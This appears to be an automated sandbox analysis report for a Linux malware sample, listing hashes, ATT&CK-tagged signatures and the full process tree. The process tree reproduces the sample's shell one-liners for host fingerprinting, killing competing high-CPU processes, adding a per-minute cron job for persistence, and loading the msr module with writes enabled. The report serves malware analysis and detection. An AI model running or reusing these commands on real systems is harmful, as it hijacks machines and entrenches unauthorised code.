8602c57b152d735fb6e44c5866cd4a837f337d5464641f55e22fd65556e41ee2

General

Target

1_noUPX
Size

6.1MB
MD5

f9ba8c3372fdaf67422703bbc2208640
SHA1

5042e58bc2e1d94912d11b11286ad6bccf0e4666
SHA256

8602c57b152d735fb6e44c5866cd4a837f337d5464641f55e22fd65556e41ee2
SHA512

d330557ff2bab35181a5b2ce550b11fc4f3dc8d38431ac26989d22b9247df955684fddf97dc11235001852b490704db3af87ed859c8a5bca3573aac66dd1018c
SSDEEP

98304:HtpIDtRKq6YrRYjfmUyy++++++qq++++u+uwP5R5R5VYjMYjMtpuVE8OLqjbOqw0:H+tAq65cKEpHVGZA2O7TI

Score

7^/10

antivm persistence rootkit

Malware Config

Signatures

Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

ioc pid process

/lib/modules/4.15.0-161-generic/kernel/arch/x86/kernel/msr.ko 689
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

1_noUPXgrepgrep

description ioc process

File opened for reading /proc/cpuinfo 1_noUPX
File opened for reading /proc/cpuinfo grep
File opened for reading /proc/cpuinfo grep

ioc	pid	process
/lib/modules/4.15.0-161-generic/kernel/arch/x86/kernel/msr.ko	689

description	ioc	process
File opened for reading	/proc/cpuinfo	1_noUPX
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

1_noUPX

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	1_noUPX

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
persistence

Scheduled Task
T1053

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.wbHA2R crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.wbHA2R	crontab

Reads CPU attributes 1 TTPs 7 IoCs

System Information Discovery

T1082

Processes:

pspspsps1_noUPX

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	1_noUPX
File opened for reading	/sys/devices/system/cpu/types	1_noUPX
File opened for reading	/sys/devices/system/cpu/possible	1_noUPX

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

Processes:

1_noUPX

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_version	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/board_name	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/board_version	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	1_noUPX

Enumerates kernel/hardware configuration 1 TTPs 59 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

1_noUPXmodprobe

description	ioc	process
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_siblings	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	1_noUPX
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	1_noUPX
File opened for reading	/sys/firmware/dmi/tables/DMI
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	1_noUPX
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/thread_siblings	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	1_noUPX
File opened for reading	/sys/kernel/mm/hugepages	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	1_noUPX
File opened for reading	/sys/devices/system/node/online	1_noUPX
File opened for reading	/sys/bus/dax/devices	1_noUPX
File opened for reading	/sys/bus/cpu/devices	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	1_noUPX
File opened for reading	/sys/module/msr/initstate	modprobe
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	1_noUPX
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	1_noUPX
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/hugepages	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/cpumap	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/meminfo	1_noUPX
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	1_noUPX
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	1_noUPX
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	1_noUPX
File opened for reading	/sys/devices/virtual/dmi/id	1_noUPX

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspsid

description	ioc	process
File opened for reading	/proc/168/stat	ps
File opened for reading	/proc/250/stat	ps
File opened for reading	/proc/349/status	ps
File opened for reading	/proc/583/cmdline	ps
File opened for reading	/proc/630/cmdline	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/158/cmdline	ps
File opened for reading	/proc/582/cmdline	ps
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/28/cmdline	ps
File opened for reading	/proc/153/stat	ps
File opened for reading	/proc/160/status	ps
File opened for reading	/proc/355/stat	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/191/stat	ps
File opened for reading	/proc/285/cmdline	ps
File opened for reading	/proc/34/status	ps
File opened for reading	/proc/168/status	ps
File opened for reading	/proc/157/cmdline	ps
File opened for reading	/proc/424/stat	ps
File opened for reading	/proc/633/stat	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/34/status	ps
File opened for reading	/proc/250/status	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/89/status	ps
File opened for reading	/proc/155/status	ps
File opened for reading	/proc/192/cmdline	ps
File opened for reading	/proc/156/status	ps
File opened for reading	/proc/355/status	ps
File opened for reading	/proc/348/stat	ps
File opened for reading	/proc/628/stat	ps
File opened for reading	/proc/655/cmdline	ps
File opened for reading	/proc/29/status	ps
File opened for reading	/proc/83/stat	ps
File opened for reading	/proc/192/stat	ps
File opened for reading	/proc/36/status	ps
File opened for reading	/proc/133/cmdline	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/158/stat	ps
File opened for reading	/proc/164/stat	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/582/cmdline	ps
File opened for reading	/proc/654/stat	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/164/status	ps
File opened for reading	/proc/34/stat	ps
File opened for reading	/proc/166/status	ps
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/368/status	ps
File opened for reading	/proc/654/cmdline	ps
File opened for reading	/proc/349/stat	ps
File opened for reading	/proc/159/cmdline	ps
File opened for reading	/proc/31/stat	ps
File opened for reading	/proc/160/status	ps
File opened for reading	/proc/159/status	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/10/status	ps

Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.

Processes:

sh1_noUPX

description ioc

File opened for modification /tmp/.cron
File opened for modification /tmp/.cron sh
File opened for modification /tmp/.lock 1_noUPX

description	ioc
File opened for modification	/tmp/.cron
File opened for modification	/tmp/.cron	sh
File opened for modification	/tmp/.lock	1_noUPX

/tmp/1_noUPX
/tmp/1_noUPX
1⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:586

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:587

/usr/bin/whoami
whoami
3⤵
PID:598

/bin/hostname
hostname
3⤵
PID:599

/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:600

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:616

/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:617

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:618

/usr/bin/id
id -u
3⤵
PID:620

/bin/ps
ps x
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:621

/bin/grep
grep /etc/cron
3⤵
PID:622

/bin/grep
grep -v grep
3⤵
PID:623

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:625

/usr/bin/id
id -u
3⤵
PID:626

/bin/ps
ps aux
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:627

/bin/grep
grep -v grep
3⤵
PID:628

/bin/grep
grep -v -- "-bash[[:space:]]*\$"
3⤵
PID:629

/bin/grep
grep -v /usr/sbin/httpd
3⤵
PID:630

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
3⤵
PID:631

/bin/sh
sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/1_noUPX' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/1_noUPX' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/1_noUPX\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
2⤵
- Writes file to tmp directory
PID:637

/bin/rm
rm -rf /tmp/.cron
3⤵
PID:639

/usr/bin/crontab
crontab -l
3⤵
PID:640

/bin/grep
grep -v grep
3⤵
PID:641

/bin/grep
grep -v /tmp/1_noUPX
3⤵
PID:642

/usr/bin/crontab
crontab /tmp/.cron
3⤵
- Creates/modifies Cron job
PID:650

/bin/rm
rm -rf /tmp/.cron
3⤵
PID:651

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
2⤵
PID:652

/usr/bin/id
id -u
3⤵
- Reads runtime system information
PID:653

/bin/hostname
hostname -I
1⤵
PID:590

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:592

/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:594

/usr/bin/head
head -n 1
1⤵
PID:596

/bin/grep
grep "Port "
1⤵
PID:595

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:597

/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:603

/usr/bin/cut
cut -d: -f2
1⤵
PID:604

/bin/sed
sed -e "s/^ *//"
1⤵
PID:605

/bin/sed
sed -e "s/\$//"
1⤵
PID:606

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:609

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:612

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:615

/usr/bin/crontab
crontab -l
1⤵
PID:644

/bin/grep
grep -v grep
1⤵
PID:645

/bin/grep
grep "/tmp/1_noUPX\$"
1⤵
PID:646

/usr/bin/sort
sort
1⤵
PID:647

/usr/bin/uniq
uniq
1⤵
PID:648

/usr/bin/wc
wc -l
1⤵
PID:649

/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:655

/bin/grep
grep -v grep
1⤵
PID:656

/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:657

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:658

/usr/bin/wc
wc -l
1⤵
PID:659

/bin/sh
sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
1⤵
PID:688

/sbin/modprobe
/sbin/modprobe msr "allow_writes=on"
2⤵
- Enumerates kernel/hardware configuration
PID:689

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

2

T1497

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.cron
Filesize
28B

MD5
5a318eca74b0ce6e05c3476169a7d28b

SHA1
09424172cc03feba1b24f4e2ca06754e5fb84465

SHA256
7324d7e99964eb39b1c76a61afb56b90b9a4e716b9ebac0e4cd51f514ce9c168

SHA512
f779ea069963b6d591db1c57c0799680d70b201d2e58c6fe194bbcde61739d8da6776cab05b29f949a6c545af29078d501e0c39f4b1c4b87685129b5963e352d

Download Submit
/var/spool/cron/crontabs/tmp.wbHA2R
Filesize
212B

MD5
092120f220fb19db0ffc9c0031d65944

SHA1
8376f587bbca9b4e4403838102a9f8aa4799abee

SHA256
fed27bad41bea562448b1bf089cf091b86f63083f6b2526c1261ec1950d1aed4

SHA512
1d68dc978cd4e6aa5954790e455207b2836fe6ce90ca343bd0cc7538c09003ff6c0a07bca55071f3df24fb003a40f78e25fac2f401e2794d2ebecbdf31012737

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads